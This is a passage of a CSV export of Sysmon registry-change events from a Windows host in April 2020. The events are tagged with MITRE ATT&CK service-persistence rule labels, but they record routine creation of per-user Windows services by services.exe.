service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.290092500Z"",""eventRecordID"":""843"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.893",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.288557000Z"",""eventRecordID"":""842"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3ddcb\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.871",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.288233000Z"",""eventRecordID"":""841"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.827",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.286809000Z"",""eventRecordID"":""840"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 26, 2020 @ 10:15:48.799",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.286440300Z"",""eventRecordID"":""839"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.784",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.284273500Z"",""eventRecordID"":""838"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.773",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.283744800Z"",""eventRecordID"":""837"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.754",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.282129300Z"",""eventRecordID"":""836"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.729",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.281886000Z"",""eventRecordID"":""835"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3ddcb\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:15:48.700",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.275736200Z"",""eventRecordID"":""834"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.695",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.275296400Z"",""eventRecordID"":""833"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.675",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.273284100Z"",""eventRecordID"":""832"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:15:48.647",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.272778300Z"",""eventRecordID"":""831"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.617",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.271093200Z"",""eventRecordID"":""830"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 26, 2020 @ 10:15:48.597",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.270828700Z"",""eventRecordID"":""829"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.584",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.269494500Z"",""eventRecordID"":""828"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.217\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 